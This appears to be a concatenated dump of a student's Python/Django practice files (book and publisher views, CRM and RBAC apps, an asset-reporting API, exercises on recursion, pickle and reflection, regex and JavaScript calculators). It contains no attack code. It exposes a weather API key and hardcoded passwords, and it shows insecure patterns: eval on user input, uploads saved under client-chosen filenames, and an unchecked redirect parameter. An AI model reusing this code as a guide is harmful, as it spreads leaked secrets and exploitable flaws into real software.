.date').text(data.HeWeather6[0].daily_forecast[2].date); //设置天气文字 $('.there .day1 .wea').text(data.HeWeather6[0].daily_forecast[0].cond_txt_d); 
$('.there .day2 .wea').text(data.HeWeather6[0].daily_forecast[1].cond_txt_d); $('.there .day3 .wea').text(data.HeWeather6[0].daily_forecast[2].cond_txt_d); //设置温度 $('.left-top .tianqi span').text(data.HeWeather6[0].daily_forecast[0].tmp_min+'℃'); $('.there .day1 .temp').text(data.HeWeather6[0].daily_forecast[0].tmp_min+'℃'); $('.there .day2 .temp_min').text(data.HeWeather6[0].daily_forecast[1].tmp_min ); $('.there .day2 .temp_max').text(data.HeWeather6[0].daily_forecast[1].tmp_max+'℃'); $('.there .day3 .temp_min').text(data.HeWeather6[0].daily_forecast[2].tmp_min); $('.there .day3 .temp_max').text(data.HeWeather6[0].daily_forecast[2].tmp_max+'℃'); }, error:function (err) { console.log(err); } }); $.ajax({ url:'https://free-api.heweather.com/s6/air/now?location=beijing&key=7e2f47ead8a94ecab4b9e04f1f8d4a3f', type:'get', success:function (data){ $('.show-air .show-polution-name').text(data.HeWeather6[0].air_now_city.qlty); $('.show-air .show-polution-num').text(data.HeWeather6[0].air_now_city.pm25); } }); $(".day").click(function () { // location.href="http://www.weather.com.cn/weather/101010100.shtml#7d" window.open("https://www.baidu.com"); }); $('.left-top').mouseover(function () { $(".wheater").stop().slideDown(500); }).mouseout(function () { $(".wheater").stop().slideUp(500); }); $('.wheater').mouseover(function () { $(".wheater").stop().slideDown(500); }).mouseout(function () { $(".wheater").stop().slideUp(500); }); });<file_sep>/day17/lianxi/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import models from django.urls import reverse from django import views from django.http import JsonResponse # Create your views here. 
# 出版社列表 def publisher_list(request): print(request.COOKIES) v = request.COOKIES.get("hu") if v == "hao": data = models.Publisher.objects.all() return render(request, "publisher_list.html", {"data": data}) else: return redirect("/login/") # 编辑出版社 url传参 # def edit_publisher(request): # # if request.method=="POST": # #获取用户更改的id # edit_id=request.POST.get("id")#从浏览器传的参数获取的id # new_name=request.POST.get("name")#从form表单获取的名字 # #去数据库找到这条记录 # obj1=models.Publisher.objects.get(id=edit_id) # print(obj1.name) # obj1.name=new_name # obj1.save() # # return redirect("/publisher_list/") # return redirect(reverse('list')) # else: # edit_id = request.GET.get("id") # publisher_edit = models.Publisher.objects.get(id=edit_id) # return render(request,"edit_publisher.html",{"obj2":publisher_edit}) # 编辑出版社 动态传参 FBV # def edit_publisher(request,edit_id): # if request.method=="POST": # # new_name=request.POST.get("name")#从form表单获取的名字 # #去数据库找到这条记录 # obj=models.Publisher.objects.get(id=edit_id) # print(obj.name) # obj.name=new_name # obj.save() # return redirect("/publisher_list/") # else: # # publisher = models.Publisher.objects.get(id=edit_id) # return render(request,"edit_publisher.html",{"obj":publisher}) # 编辑出版社 CBV动态传参 class EditPublisher(views.View): def get(self, request, edit_id): obj = models.Publisher.objects.get(id=edit_id) return render(request, "edit_publisher.html", {"obj": obj}) def post(self, request, edit_id): obj = models.Publisher.objects.get(id=edit_id) new_name = request.POST.get("name") # 获取用户输入的新名字 obj.name = new_name obj.save() return redirect(reverse('list')) # 跳到展示页面,用的别名 # 上传文件 class upload(views.View): def get(self, request): return render(request, "upload.html") def post(self, request): file_obj = request.FILES.get("code") # 保存下来 filename = file_obj.name with open(filename, "wb")as f: for i in file_obj.chunks(): f.write(i) return HttpResponse("上传成功") # json格式化 class JsonTest(views.View): def get(self, request): res = {"code": 0, "data": "alex"} res2 = ["alex", 
"污Sir", "金老板", "小姨妈", "MJJ"] return JsonResponse(res2, safe=False) # 模板语法 def template_test(request): data = ["金老板", "景女神", "MJJ"] # data="" filesize = 12345 import datetime today = datetime.datetime.today() value = "<a href='#'>点我</a>" class Person(object): def __init__(self, name, dream): self.name = name # self.dream=dream def dream(self): return "我的梦想是学好python" pw = Person("bob", "环游世界") return render(request, "template_test.html", { "data": data, "file_size": filesize, "today": today, "value": value, "person": pw }) # csrf 跨站请求 def csrf_test(request): if request.method == "POST": print(request.POST) return HttpResponse("OK") else: return render(request, "csrf_test.html") # book_list def book_list(request): # 去数据库查询所有的书籍 v = request.COOKIES.get("hu") path = request.path_info if v == "hao": data = models.Book.objects.all() return render(request, "book_list.html", {"book_list": data}) else: return redirect("/login/?path=%s" %path) # add_book def add_list(request): if request.method == "POST": name = request.POST.get("title") # print(name) publisher_id = request.POST.get("publisher") publisher_obj = models.Book.objects.get(id=publisher_id) models.Book.objects.create(title=name, publisher_id=publisher_id) return redirect("/book_list/") else: data = models.Publisher.objects.all() return render(request, "add_book.html", {"publisher_list": data}) # del_book def del_book(request, pk): if request.method == "GET": models.Book.objects.get(id=pk).delete() return redirect("/book_list") # edit_book def edit_book(request, pk): if request.method == "GET": book_id = models.Book.objects.get(id=pk) # 获取书的id publisher_obj = models.Publisher.objects.all() # 查出所有的出版社 return render(request, "edit_book.html", {"book": book_id, "publisher_list": publisher_obj}) else: book_obj = models.Book.objects.get(id=pk) # 更改之前的书名字 new_title = request.POST.get("title") new_publisher_id = request.POST.get("publisher") book_obj.title = new_title book_obj.publisher_id = new_publisher_id 
book_obj.save() return redirect("/book_list/") def login(request): if request.method == "POST": path = request.GET.get("path") print(path) username = request.POST.get("username") pwd = request.POST.get("pwd") if username == "alex" and pwd == "123": if path: rep = redirect(path) else: rep = redirect("/publisher_list/") rep.set_signed_cookie("hu", "hao", salt="ooxx", max_age=7) return rep else: return HttpResponse("用户名或者密码错误") else: # next = request.GET.get("next") # print(next) return render(request, "login.html") <file_sep>/day6/5.组合.py # 组合 # 一个类的对象作为另外一个类对象的属性 # class Person: # def __init__(self,name,sex,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog: # def __init__(self,name,kind,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.kind = kind # # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # # class Weapon: # def __init__(self,name,price,dps): # self.name = name # self.price = price # self.dps = dps # def kill(self,dog): # dog.hp -= self.dps # # alex = Person('alex','N/A',250,5) # ha2 = Dog('哈士奇','藏獒',15000,200) # # print(alex.name) # roubaozi = Weapon('肉包子',600000,10000) # alex.money = 1000000 # if alex.money >= roubaozi.price: # alex.weapon = roubaozi # alex.weapon.kill(ha2) # print(ha2.hp) # 基础数据类型 都是类 # 'alex' : str的对象 # alex.name = 'alex' # alex.name.startswith('a') #给alex装备一个武器 # 圆形类 --> 圆环类 # 已知圆形类 的基础上 运用组合 求圆环的面积和周长 # 一个类的对象给另一个类对象当属性 # 圆环 # 圆 # 圆环的面积 from math import pi class Circle: def __init__(self,r): self.r = r def area(self): return pi * self.r ** 2 def perimeter(self): return self.r *pi * 2 class Ring: def __init__(self,outside_r,inside_r): self.out_circle = Circle(outside_r) self.in_circle = Circle(inside_r) def area(self): return 
self.out_circle.area() - self.in_circle.area() def perimeter(self): return self.out_circle.perimeter() + self.in_circle.perimeter() r = Ring(10,5) print(r.area()) print(r.perimeter()) # 组合 是描述了 一种 什么有什么的关系 圆环有圆 人有武器 <file_sep>/day9/线程/回调函数clallback.py #!/usr/bin/env python # -*- coding:utf-8 -*- from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor # from multiprocessing import Pool import requests # 需要你安装一下 是一个扩展模块 pip install requests import os def get_page(url): print('<进程%s> get %s' %(os.getpid(),url)) respone=requests.get(url) if respone.status_code == 200: return {'url':url,'text':respone.text} def parse_page(res): res=res.result() print('<进程%s> parse %s' %(os.getpid(),res['url'])) parse_res='url:<%s> size:[%s]\n' %(res['url'],len(res['text'])) with open('db.txt','a') as f: f.write(parse_res) if __name__ == '__main__': # ret = get_page('https://www.baidu.com') # print(ret) urls=[ 'https://www.baidu.com', 'https://www.python.org', 'https://www.openstack.org', 'https://help.github.com/', 'http://www.sina.com.cn/' ] p=ProcessPoolExecutor(3) for url in urls: p.submit(get_page,url).add_done_callback(parse_page) #parse_page拿到的是一个future对象obj,需要用obj.result()拿到结果 <file_sep>/day27/s21crm/crm/templates/public_custom_list.html {% extends 'layout.html' %} {% block content %} <form method="post"> {% csrf_token %} <div> <a href="{% url 'public_customer_add' %}" class="btn btn-success">添加</a> <input type="submit" value="申请到我的私户" class="btn btn-primary"> </div> <table class="table table-bordered"> <thead> <tr> <th>选择</th> <th>姓名</th> <th>联系方式</th> <th>状态</th> <th>转介绍</th> <th>咨询课程</th> <th>操作</th> </tr> </thead> <tbody> {% for row in queryset %} <tr> <td> <input name="pk" type="checkbox" value="{{ row.id }}"> </td> <td>{{ row.name }}</td> <td>{{ row.qq }}</td> <td>{{ row.get_status_display }}</td> <td>{{ row.referral_from.name }}</td> <td> {% for ele in row.courses.all %} <span style="display: inline-block;padding: 5px;border: 1px solid #dddddd;"> {{ ele.name 
}} </span> {% endfor %} </td> <td> <a href="{% url 'public_customer_edit' row.id %}">编辑</a> <a href="{% url 'public_customer_del' row.id %}">删除</a> </td> </tr> {% endfor %} </tbody> </table> </form> {% endblock %}<file_sep>/day4/7.递归.py # def func(): # print(1) # func() # # func() # 997 /998 # import sys # def foo(n): # print(n) # n += 1 # foo(n) # foo(1) # 6! # print(6*5*4*3*2*1) # def fn(n): # if n == 1:return 1 # return n*fn(n-1) # print(fn(6)) # 递归 就是自己调用自己 # 递归需要有一个停止的条件 # def fn(6): # if 6 == 1:return 1 # return 6*fn(5) # print(fn(6)) # # def fn(5): # return 5*fn(4) # # def fn(4): # return 4*fn(3) # # def fn(3): # return 3*fn(2) # # def fn(2): # return 2*fn(1) # # def fn(1): # return 1 # import sys # sys.setrecursionlimit(5000) # n=0 # def func(): # global n # n+=1 # print(n) # func() # func() ##求年龄 def age(n): # global n # n+=1 if n==4: return 40 elif n>0 and n<4: return age(n+1)+2 print(age(1)) <file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/views.py import json from django.shortcuts import render, HttpResponse from django.views.decorators.csrf import csrf_exempt from django.utils.decorators import method_decorator from django.views import View from api import models from api import service """ @method_decorator(csrf_exempt,name='dispatch') class AssetView(View): # @method_decorator(csrf_exempt) # def dispatch(self, request, *args, **kwargs): # return super().dispatch(request, *args, **kwargs) def get(self,requset,*args,**kwargs): host_list = ['c1.com', 'c2.com', 'c3.com'] return HttpResponse(json.dumps(host_list)) def post(self,request,*args,**kwargs): info = json.loads(request.body.decode('utf-8')) print(info) return HttpResponse('收到了') """ from rest_framework.views import APIView from rest_framework.response import Response class AssetView(APIView): def get(self, requset, *args, **kwargs): host_list = ['c1.com', 'c2.com', 'c3.com'] # return HttpResponse(json.dumps(host_list)) return Response(host_list) def post(self, request, *args, **kwargs): """ 资产汇报的API 
:param request: :param args: :param kwargs: :return: """ print(request.data) # ###################### agent模式汇报 ###################### result = {'status': True, 'data': None, 'error': None} asset_type = request.data.get('type') if asset_type == 'create': # ################## 增加资产 ################## # 1. 在server表添加数据 server_dict = {} server_dict.update(request.data['basic']['data']) server_dict.update(request.data['cpu']['data']) server_dict.update(request.data['board']['data']) # 新建服务器,server代表新创建的数据 server = models.Server.objects.create(**server_dict) # 2. 硬盘 disk_info = request.data['disk']['data'] for k, v in disk_info.items(): v['server'] = server models.Disk.objects.create(**v) # 3. 网卡 nic_info = request.data['nic']['data'] for k, v in nic_info.items(): print(k, v) v['server'] = server v['name'] = k models.NIC.objects.create(**v) # 4. 内存 memory_info = request.data['memory']['data'] for k, v in memory_info.items(): v['server'] = server models.Memory.objects.create(**v) elif asset_type == 'update': # 更新资产 hostname = request.data['basic']['data']['hostname'] server = models.Server.objects.get(hostname=hostname) service.process_basic(request, hostname) service.process_disk(request, server) service.process_nic(request, server) service.process_memory(request, server) elif asset_type == 'host_update': # 更新资产+更新主机名 # 获取主机名 hostname = request.data['cert'] # 老的主机名 server = models.Server.objects.filter(hostname=hostname) service.process_basic(request, hostname) service.process_disk(request, server) service.process_nic(request, server) service.process_memory(request, server) result['data'] = request.data['basic']['data']['hostname'] return Response(result) <file_sep>/day5/计算器作业/作业1.py import re res = re.compile(r'\([^()]+\)') ##匹配最小单位的括号 input_filter=re.compile('[a-zA-Z]') def check_rede_and_except(s): ##检测表达式里面是否有乘除法 global ret s1=s.replace(' ','') l = re.findall('([\d\.]+|/|-|\+|\*)',s1) ##['100.5', '+', '40', '*', '5', '/', '2', '-', '3', '*', '2', '*', '2', '/', '4', 
'+', '9'] #print(l) while 1: if '*' in l and '/' not in l: ret = jisuan_rede_and_except(l,'*') #print(l) elif '/' in l and '*' not in l: ret = jisuan_rede_and_except(l,'/') elif '/' in l and '*' in l: a=l.index('*') b=l.index('/') if a<b: ret = jisuan_rede_and_except(l,'*') else: ret = jisuan_rede_and_except(l,'/') else: break #print('我是第二个',l) return jisuan_jia_and_jian(l) def jisuan_rede_and_except(l,x): ##计算乘除 #print("l:%s %s:x" % (l,x)) # print(l) a = l.index(x) if x=='*' and l[a+1] !='-': k=float(l[a-1]) * float(l[a+1]) elif x=='/' and l[a+1] !='-': k=float(l[a-1]) / float(l[a+1]) elif x=='*' and l[a+1] =='-': k=-(float(l[a-1]) * float(l[a+2])) elif x=='/' and l[a+1] =='-': k=-(float(l([a-1])) / float(l[a+2])) del l[a-1],l[a-1], l[a-1] l.insert(a-1,str(k)) #print('我是第一个',l) return l ##['100.5', '+', '100.0', '-', '3.0', '+', '9'] 上面的ret接收到l def jisuan_jia_and_jian(l): ##计算加减 global ret sum = 0 while l: ##l=['100.5', '+', '100.0', '-', '3.0', '+', '9'] i=1,3,5 if l[0] == '-': ##['-','1','+','2'] l[0] = l[0] + l[1] ##l[0]=-1 del l[1] ##把1删除 sum += float(l[0]) for i in range(1, len(l), 2): ##取出l列表里面的加减符号 if l[i] == '+' and l[i + 1] != '-': sum += float(l[i + 1]) elif l[i] == '+' and l[i + 1] == '-': sum -= float(l[i + 2]) elif l[i] == '-' and l[i + 1] == '-': sum += float(l[i + 2]) elif l[i] == '-' and l[i + 1] != '-': sum -= float(l[i + 1]) break return sum def brackets(expression): ##检查是否有括号 if not res.search(expression): # 匹配最里面的括号,如果没有的话,直接进行运算,得出结果 return check_rede_and_except(expression) k = res.search(expression).group() ##取出最小括号里面的值 # print(k) expression = expression.replace(k, str(check_rede_and_except(k[1:len(k) - 1]))) #print(expression) ''' expression结果: 1 - 2 * ( (60-30 +-5.0 * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) ) 1 - 2 * ( (60-30 +-5.0 * 173545.88095238098) - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ 10.0 ) 1 - 
2 * -867698.2047619049 ''' return brackets(expression) print('我是eval:%s'%(eval('1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )'))) # s= '1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )' #s2='9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14' #print(eval('9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14')) # print(brackets(s)) # # check_rede_and_except(s2) while True: # print("退出请按q\Q") s = input('请输入你想要计算的数字:') a = s.replace(' ','') if input_filter.search(a) or s.count('(') != s.count(')'): print("你输入的表达式有误,请重新输入") continue elif s =='': continue else: print(brackets(a)) # if a == 'q' or a == 'Q': # exit() <file_sep>/day4/优秀的作业/优秀的作业/张晶瑜/homework/readme.txt http://www.cnblogs.com/kuaizifeng/p/8876619.html<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/base.py #!/usr/bin/python # -*- coding:utf-8 -*- from config import settings class BasePlugin(object): def __init__(self): self.debug = settings.DEBUG self.base_dir = settings.BASEDIR def get_os(self,handler,host): # return handler.cmd('查看系统的命令',host) return 'linux' def process(self,handler,hostname): os = self.get_os(handler,hostname) if os == 'windows': return self.win(handler,hostname) else: return self.linux(handler,hostname) def win(self,handler,hostname): raise NotImplementedError('win must be implemented ') def linux(self, handler, hostname): raise NotImplementedError('linux must be implemented ')<file_sep>/day27/s21crm/rbac/views/role.py from django.shortcuts import render, redirect from rbac import models from rbac.forms.role import RoleModelForm def role_list(request): """ 部门列表 :param request: :return: """ queryset = models.Role.objects.all() return render(request, 'role_list.html', {'queryset': queryset}) def role_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = RoleModelForm() return render(request, 'role_add.html', {'form': form}) form = RoleModelForm(data=request.POST) if form.is_valid(): 
form.save() return redirect('role_list') else: return render(request, 'role_add.html', {'form': form}) def role_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Role.objects.filter(id=nid).first() if request.method == "GET": form = RoleModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'role_edit.html', {"form": form}) form = RoleModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('role_list') else: return render(request, 'role_edit.html', {"form": form}) def role_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Role.objects.filter(id=nid).delete() return redirect('role_list') <file_sep>/deploy/web/templatetags/web.py from django.template import Library from django.urls import reverse from django.http import QueryDict register = Library() @register.simple_tag def memory_url(request, name, *args, **kwargs): """ 生成URL(含条件) :return: """ base_url = reverse(name, args=args, kwargs=kwargs) if not request.GET: # 如果获取不到url后面的参数,就返回基本的url return base_url # 实例化一个参数,QueryDict就是负责把多个参数转换成一个参数的 new_query_dict = QueryDict(mutable=True) # 这个是把url后面的多个参数转换成了一个参数,request.GET.urlencode() 是获取url后面的参数 new_query_dict['_filter'] = request.GET.urlencode() # _filter=pagesdf5sdfagesdfsdf1 url = "%s?%s" % (base_url, new_query_dict.urlencode(),) # 最后返回url+后面携带的参数 return url @register.simple_tag def deploy_status(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) # 根据hostID if not deploy_record_object: return '未发布' else: return deploy_record_object.get_status_display() @register.simple_tag def host_version(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) if not deploy_record_object: return '0' else: return deploy_record_object.host_version @register.simple_tag def host_datetime(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) if not 
deploy_record_object: return '0' else: return deploy_record_object.deploy_time @register.simple_tag def log_info(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) if not deploy_record_object: return '0' else: return deploy_record_object.log <file_sep>/deploy/web/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2019-01-04 03:17 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Department', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, verbose_name='部门')), ], ), migrations.CreateModel( name='Deploy', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('version', models.CharField(max_length=32, verbose_name='版本')), ('uid', models.CharField(blank=True, max_length=32, null=True, verbose_name='上线文件包名称')), ('status', models.IntegerField(choices=[(1, '未获取'), (2, '待发布'), (3, '已发布'), (4, '已回滚')], default=1, verbose_name='状态')), ], ), migrations.CreateModel( name='DeployRecord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('host_version', models.CharField(max_length=32, null=True, verbose_name='版本')), ('status', models.IntegerField(choices=[(1, '发布中'), (2, '成功'), (3, '失败')], default=1, verbose_name='状态')), ('deploy_time', models.DateTimeField(auto_now_add=True, verbose_name='部署时间')), ('log', models.TextField(verbose_name='日志')), ('deploy', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Deploy', verbose_name='部署任务')), ], ), migrations.CreateModel( name='Host', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hostname', 
models.CharField(max_length=32, verbose_name='主机名')), ('ssh_port', models.IntegerField(verbose_name='SSH端口')), ], ), migrations.CreateModel( name='Project', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, verbose_name='项目名称')), ('git', models.CharField(max_length=128, verbose_name='仓库地址')), ('private', models.BooleanField(default=True, verbose_name='是否私有')), ('online_path', models.CharField(max_length=128, verbose_name='线上项目路径')), ('depart', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Department', verbose_name='部门')), ('hosts', models.ManyToManyField(to='web.Host', verbose_name='关联主机')), ], ), migrations.CreateModel( name='RollbackRecord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('host_version', models.CharField(max_length=32, null=True, verbose_name='版本')), ('status', models.IntegerField(choices=[(1, '发布中'), (2, '成功'), (3, '失败')], default=1, verbose_name='状态')), ('deploy_time', models.DateTimeField(auto_now_add=True, verbose_name='部署时间')), ('rollback_log', models.TextField(verbose_name='日志')), ('deploy', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Deploy', verbose_name='部署任务')), ('host', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Host', verbose_name='主机')), ], ), migrations.CreateModel( name='Script', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=128, verbose_name='标题')), ('interpreter', models.CharField(choices=[('py', 'python3'), ('sh', 'bash')], default='py', max_length=16, verbose_name='解释器')), ('code', models.TextField(verbose_name='上传脚本')), ('rollback_code', models.TextField(null=True, verbose_name='回滚脚本')), ], ), migrations.CreateModel( name='UserInfo', fields=[ ('id', models.AutoField(auto_created=True, 
primary_key=True, serialize=False, verbose_name='ID')), ('username', models.CharField(max_length=32, verbose_name='用户名')), ('password', models.CharField(max_length=64, verbose_name='密码')), ('server_name', models.CharField(max_length=32, verbose_name='SSH用户名')), ('server_private_key', models.TextField(verbose_name='SSH私钥')), ('git_name', models.CharField(max_length=32, verbose_name='git用户名')), ('git_pwd', models.CharField(max_length=32, verbose_name='git密码')), ], ), migrations.AddField( model_name='deployrecord', name='host', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Host', verbose_name='主机'), ), migrations.AddField( model_name='deploy', name='project', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Project', verbose_name='项目'), ), migrations.AddField( model_name='deploy', name='script', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='web.Script', verbose_name='script'), ), ] <file_sep>/day7/序列化.py # 什么叫序列化呢? # { '10100011':{'name':,age: ,class:},} # 数据类型 —— 字符串的过程 # 什么时候要用序列化呢? # 数据从内存到文件 # 数据在网络上传输 字节 - 字符串 - 字典 # python中的序列化模块都有哪些? 
# json 通用的 支持的数据类型 list tuple dict # pickle python中通用的 支持几乎所有python中的数据类型 # shelve python中使用的便捷的序列化工具 ''' #json #dumps和loads是和内存交互的 #dump和load是和文件交互的 import json dic={'k':'v'} # print(type(dic)) # json_dic=json.dumps(dic) # 字典转字符串的过程 ——序列化 # print(json_dic) # print(dic) # print(type(json_dic)) # print(json.loads(json_dic)) #字符串 转回其他数据类型 —— 反序列化 #注意可以dump多次,但是不能多次load # with open('d','w')as f: # json.dump(dic,f) #和文件交互 # # with open('d')as f: # print(json.load(f)) #怎样dump多条数据 # 如果要dump多条数据 # 每一条数据先dumps一下 编程字符串 然后打开文件 write写进文件里 \n # 读取的时候按照标志读取或者按行读 # 读出来之后 再使用loads with open('aaa','w')as f: str_dic=json.dumps(dic) f.write(str_dic+'\n') f.write(str_dic + '\n') f.write(str_dic + '\n') with open('aaa')as f: for line in f: print(json.loads(line.strip())) ''' #pickle import pickle class A: def __init__(self,name): self.name=name alex=A('alex') print(pickle.dumps(alex)) with open('b_pickle','wb')as f: pickle.dump(alex,f) pickle.dump(alex, f) with open('b_pickle','rb')as f: while True: try: obj=pickle.load(f) print(obj.name) except EOFError: break #注意 #1.pickle支持更多的数据类型 # 2.pickle的结果是二进制 # 3.pickle在和文件交互的时候可以被多次load<file_sep>/day15/python连接mysql/mysql连接.py import pymysql user=input('用户名:').strip() pwd=input('密码:').strip() # 连接数据库 conn=pymysql.connect(host='localhost',user='root',password='123',database='user',charset='utf8') # 游标 cursor=conn.cursor() #执行完毕返回的结果集默认以元组显示 # # #执行sql语句 sql="select * from t1 where name=%s and pwd=%s" print(sql) res=cursor.execute(sql,[user,pwd]) #执行sql语句,返回sql查询成功的记录数目 print(res) cursor.close() # conn.close() if res: print('登录成功') else: print('登录失败')<file_sep>/day1/作业_login.py ##1 取出列表里面的字典,然后取字典的值,即用户名和密码 #2 创建一个循环去读用户名和密码,然后和你输入的用户名和密码做比较 #3 如果成功就提示成功并跳出循环 #4 如果不成功会提示重新输入,直到第三次,会提示你在给你三次机会,如果输入要y就重新给你三次机会,否则就退出整个循环 # li = [{'username':'alex','password':'SB'}, {'username':'wusir','password':'sb'}, {'username':'taibai','password':'123'},] a=0 b=0 while a < 3: username = input("请输入你的用户名:") passwd = input("请输入你的密码:") for i in li: if username == 
i['username'] and passwd == i['password']: print('登录成功') exit() else: print("登录失败请重新登录") a += 1 b += 1 if a == 3:##当第一次的机会用完之后,在给她三次机会 a=0 if b == 6: ##当b=6的时候就已经循环了两次,所有退出占整个循环 print ("你的六次机会已经全部用完,拜拜!") break m=input("还可以给你三次机会,请输入Y:") if m=="Y": continue else: print ("臭不要脸,你已经放弃了在玩三次的机会。") break # 博客地址 http://www.cnblogs.com/huningfei/articles/8692321.html <file_sep>/cmdb/auto_server - 7 - 资产信息入库/相关脚本/1.数据比对.py #!/usr/bin/python # -*- coding:utf-8 -*- disk_info = { '#1':{'factory':'x1','model':'x2','size':600}, '#2':{'factory':'x1','model':'x2','size':500}, '#3':{'factory':'x1','model':'x2','size':600}, '#4':{'factory':'x1','model':'x2','size':900}, } disk_queryset = [ {'slot':'#1','factory':'x1','model':'x2','size':600}, {'slot':'#2','factory':'x1','model':'x2','size':100}, {'slot':'#6','factory':'x1','model':'x2','size':300}, ] disk_info_set = set(disk_info) disk_queryset_set = { row['slot'] for row in disk_queryset } # 找到disk_info有,disk_queryset 无 ---> 应该新增硬盘 r1 = disk_info_set-disk_queryset_set print(r1) # 找到disk_queryset有,disk_info无 ---> 应该删除硬盘 r2 = disk_queryset_set - disk_info_set print(r2) # 找到disk_info有,disk_queryset 有 ---> 应该更新的硬盘 r3 = disk_queryset_set & disk_info_set print(r3)<file_sep>/auto_client/反射set.py class Foo: f = '类的静态变量' def __init__(self,name,age): self.name=name self.age=age def say_hi(self): print('hi,%s'%self.name) obj=Foo('egon',73) print(obj.__dict__,type(obj)) #检测是否含有某属性 print(hasattr(obj,'name')) print(hasattr(obj,'say_hi')) #获取属性 n=getattr(obj,'name') print(n) func=getattr(obj,'say_hi') func() print(getattr(obj,'aaaaaaaa','不存在啊')) #报错 #设置属性 setattr(obj,'sb',True) setattr(obj,'age','88') setattr(obj,'show_name',lambda self:self.name+'sb') print(obj.__dict__) # print(obj.show_name(obj)) # #删除属性 # delattr(obj,'age') # delattr(obj,'show_name') # delattr(obj,'show_name111')#不存在,则报错 # # print(obj.__dict__) <file_sep>/day22/new/rbac/models.py from django.db import models # Create your models here. 
from django.db import models # Create your models here. # 用户表 class UserInfo(models.Model): username = models.CharField(max_length=16, verbose_name="用户名") password = models.CharField(max_length=32, verbose_name="密码") roles = models.ManyToManyField(to="Role", null=True, blank=True) # null=TRUE是告诉数据库这个字段可以为空,blank=True告诉djangoadmin可以不填 def __str__(self): return self.username class Meta: verbose_name = "用户表" verbose_name_plural = verbose_name # 角色 class Role(models.Model): title = models.CharField(max_length=32, verbose_name="角色名称") permissions = models.ManyToManyField(to="Permission") def __str__(self): return self.title class Meta: verbose_name = "角色表" verbose_name_plural = verbose_name # 权限表 class Permission(models.Model): title = models.CharField(max_length=16, verbose_name="权限名称") url = models.CharField(max_length=255, verbose_name="URL") is_menu = models.BooleanField(default=False, verbose_name="可作为菜单展示") icon = models.CharField(max_length=16, verbose_name="菜单图标", null=True, blank=True) def __str__(self): return self.title class Meta: verbose_name = "权限表" verbose_name_plural = verbose_name
f72fa4432e6abb742cbf1c61c580db1ed688a311
[ "JavaScript", "Python", "Text", "HTML" ]
352
Python
huningfei/python
9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2
7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7
refs/heads/master
<repo_name>raathore/calculator<file_sep>/script.js var displayField = document.getElementById("io"); display = (val) => displayField.value+=val; solve = () => { let a = displayField.value; displayField.value = eval(a); } clr = () => displayField.value= ""; backSpace = () => displayField.value = displayField.value.substring(0,displayField.value.length-1); dark = () => { document.getElementById("main").classList.add("dark"); document.getElementById("container").classList.add("darkContainer"); document.getElementById("colorThemeBtn").innerHTML="Light Mode" document.getElementById("colorThemeBtn").setAttribute("onclick","light()") } light = () => { document.getElementById("main").classList.remove("dark"); document.getElementById("container").classList.remove("darkContainer"); document.getElementById("colorThemeBtn").innerHTML="Dark Mode" document.getElementById("colorThemeBtn").setAttribute("onclick","dark()") } <file_sep>/README.md # Simple Calculator ### With dark/light mode.
7e22c2b49b24e96cdf13370d242554a2847266f4
[ "JavaScript", "Markdown" ]
2
JavaScript
raathore/calculator
